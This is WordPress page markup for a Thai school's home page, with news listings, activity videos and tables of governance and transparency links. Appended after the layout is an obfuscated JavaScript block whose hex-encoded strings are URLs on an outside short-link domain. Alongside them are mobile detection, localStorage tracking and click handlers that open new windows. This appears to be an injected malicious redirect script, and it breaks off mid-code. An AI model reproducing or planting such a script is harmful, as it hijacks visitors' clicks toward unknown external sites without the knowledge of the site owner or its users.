data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/headline {\"uniqueId\":\"0ec6139a\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"22px\"}} -->\n<h2 class=\"gb-headline gb-headline-0ec6139a gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/grid {\"uniqueId\":\"19bd4464\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"2cef18b9\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":138} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448905004_973201524597519_7994539186753533290_n-1.jpg\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุนทนภู่.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"66a01ab5\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":142} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Untitled.png\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุขาดี.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid --></div>\n<!-- /wp:group --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else 